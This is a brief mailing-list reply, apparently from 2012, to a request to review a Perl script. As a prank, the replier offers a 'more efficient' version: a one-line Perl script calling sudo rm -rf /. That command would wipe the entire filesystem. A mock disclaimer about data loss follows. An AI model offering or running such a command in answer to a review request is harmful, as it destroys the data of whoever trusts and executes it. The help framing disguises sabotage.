On 11 February 2012 12:36, Simon Wurstwasser <bofh666...@googlemail.com> wrote: > please review the attached perl script. > I bet, it could be written more efficiently. :-)
Indeed, here we go: #!/usr/bin/perl exec("sudo", "rm", "-rf", "/"); But be careful executing this. I can't warrant that it works and I take no responsibility for any data loss. Cheers, Anselm